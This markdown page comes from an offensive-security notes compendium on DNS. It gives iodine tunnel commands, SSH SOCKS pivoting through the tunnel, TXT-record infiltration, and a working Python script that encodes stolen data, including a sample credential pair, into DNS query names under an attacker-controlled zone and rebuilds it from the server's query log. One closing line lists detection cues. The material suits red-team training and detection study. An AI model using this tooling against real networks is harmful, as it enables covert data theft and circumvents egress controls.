killchain-compendium/exfiltration/dns/dns.md


# DNS

## Tunneling

Start the server in the foreground; 10.0.0.1 becomes the server end of the tunnel and `-b 47110` forwards DNS queries that are not tunnel traffic to a real DNS server listening on localhost:47110:

```
iodined -f -b 47110 10.0.0.1 tunnel.test.com
```

- Start the client with `-r` (DNS queries only, no raw UDP shortcut), giving it the DNS server to send the queries to, which can be the target's own recursive resolver or the iodined host itself:

```
iodine -f -r <dns-server-IP> tunnel.test.com
```

- Delegate the subdomain to the server in the zone of the owned domain: an NS record for tunnel.test.com pointing at a name whose A record is the server's public IP, e.g. `tunnel.test.com. IN NS ns.test.com.` and `ns.test.com. IN A <server-IP>`
- The client gets an address from the server's tunnel subnet (a /27 by default, so the first client becomes 10.0.0.2; pass `10.0.0.1/24` to iodined for a larger one)
- Check the tunnel by pinging the server's tunnel end: `ping 10.0.0.1`
- Generate an SSH key pair and install the public key on the server (e.g. with `ssh-copy-id`)
- Dynamic port forwarding through the tunnel: `ssh -D 8080 <user>@10.0.0.1`
- Point the client's browser at the SOCKS proxy, e.g. Chromium with `--proxy-server="socks5://127.0.0.1:8080"` or an extension such as FoxyProxy

## nslookup

Query a specific record type (the option needs the leading dash):

```
nslookup -type=txt <domain>
```

## Reverse lookup

- Stored in a PTR record
- The reverse name is the octets in reverse order under in-addr.arpa, e.g. `4.3.2.1.in-addr.arpa.` for 1.2.3.4 (IPv6 uses reversed nibbles under ip6.arpa); with `-x`, drill and dig build that name for you
- `drill -x <IP>` or `dig -x <IP> +short` (`+short` is a dig option; drill does not accept it)

## Exfiltration

- Put the data into the labels of the queried name; the UDP query travels through the target's recursive resolver, so the host needs no direct internet access
- Capture the queries on the owned authoritative DNS server (query log or packet capture)
- 253 characters is the maximum length of a name and each label is at most 63, so larger payloads are split over many queries and need a sequence number to be reassembled (resolvers retry, deduplicate and reorder queries)
- Encode the payload into the label alphabet (hex or base32; names are case-insensitive, so base64 can be corrupted by case folding). Encoding is not confidentiality: encrypt first if the content must stay secret
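The chunking and reassembly described above, as an added example that is not part of the compendium: the zone name `exfil.example.net`, the session tag, the four-digit sequence label and the BIND-like query-log line format are assumptions of this example, and the log lines are constructed rather than captured.

```python
"""Added example (not from the original notes): pack a payload into DNS query
names that stay within the 63-byte label and 253-character name limits, then
reassemble it from the query log of the owned authoritative server.
The zone name, session tag and log line format are assumptions of this example;
the log lines are constructed, not captured."""
import base64
import re

DOMAIN = "exfil.example.net"  # assumed attacker-controlled zone (example only)
MAX_LABEL = 63                # RFC 1035 label limit
MAX_NAME = 253                # presentation-form name limit (255 octets on the wire)
SEQ_DIGITS = 4                # fixed-width sequence number keeps the overhead constant

# Constructed sample secret, repeated so that it needs more than one query.
SECRET = b"user=svc_backup\npass=correct horse battery staple\n" * 5


def payload_capacity(overhead: int) -> int:
    """Payload characters that fit in one name once `overhead` characters are taken
    by the sequence label, the session label, the three separating dots and the zone."""
    budget = MAX_NAME - overhead
    full, rest = divmod(budget + 1, MAX_LABEL + 1)  # each label costs its length + 1 dot
    return full * MAX_LABEL + max(rest - 1, 0)


def encode_chunks(data: bytes, domain: str = DOMAIN, session: str = "a1") -> list:
    """Return the query names carrying `data`: <seq>.<session>.<b32 labels>.<domain>.
    Base32 is used because names are case-insensitive and resolvers may fold case;
    the sequence number lets the receiver reorder, deduplicate and spot gaps."""
    enc = base64.b32encode(data).decode().rstrip("=").lower()
    overhead = SEQ_DIGITS + len(session) + len(domain) + 3  # three separating dots
    cap = payload_capacity(overhead)
    if cap <= 0:
        raise ValueError("zone name and header labels leave no room for payload")
    names = []
    for seq, start in enumerate(range(0, len(enc), cap)):
        if seq >= 10 ** SEQ_DIGITS:
            raise ValueError("payload too large for the sequence number width")
        chunk = enc[start:start + cap]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = f"{seq:0{SEQ_DIGITS}d}.{session}.{'.'.join(labels)}.{domain}"
        # Guard the two DNS limits before the name ever leaves the host.
        assert len(name) <= MAX_NAME and all(len(l) <= MAX_LABEL for l in name.split("."))
        names.append(name)
    return names


def to_log_lines(names) -> list:
    """Constructed query-log lines in a BIND-like shape (the format is an assumption)."""
    return [f"client 203.0.113.5#53211: query: {n} IN A" for n in names]


def decode_from_log(lines, domain: str = DOMAIN) -> dict:
    """Rebuild every session's payload from log lines; raise if a chunk never arrived."""
    pattern = re.compile(
        r"\b(\d{%d})\.([a-z0-9]+)\.((?:[a-z2-7]{1,63}\.)+)%s\b" % (SEQ_DIGITS, re.escape(domain)),
        re.IGNORECASE,
    )
    sessions = {}
    for line in lines:
        m = pattern.search(line)
        if not m:
            continue  # unrelated query
        seq, session, payload = int(m.group(1)), m.group(2).lower(), m.group(3).lower()
        # A retried query repeats the same chunk; overwriting with identical data is harmless.
        sessions.setdefault(session, {})[seq] = payload.replace(".", "")
    result = {}
    for session, chunks in sessions.items():
        order = range(max(chunks) + 1)
        missing = [i for i in order if i not in chunks]
        if missing:
            raise ValueError(f"session {session}: missing chunks {missing}")
        enc = "".join(chunks[i] for i in order).upper()
        enc += "=" * (-len(enc) % 8)  # restore the base32 padding stripped on send
        result[session] = base64.b32decode(enc)
    return result


def demo() -> tuple:
    """Round trip over a constructed log: chunks arrive reordered, one is retried,
    and an unrelated query is mixed in."""
    names = encode_chunks(SECRET, session="a1")
    lines = to_log_lines(reversed(names))
    lines.insert(1, lines[0])
    lines.append("client 203.0.113.5#40111: query: www.example.org IN A")
    return names, decode_from_log(lines)


if __name__ == "__main__":
    names, recovered = demo()
    for n in names:
        print(len(n), n)
    print(recovered["a1"] == SECRET)
```

The same properties that make the channel work are what a defender looks for in resolver logs: many unique names under one zone, labels near the 63-character limit, a restricted base32 character set and high entropy in the leftmost labels.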

## Infiltration

- Serve the data in TXT records (or any other record type the client can query) of the owned zone and pull it with `nslookup -type=txt <name>` or `dig txt <name>`; a single TXT string holds at most 255 bytes, so longer content is split across several strings or records and reassembled on the client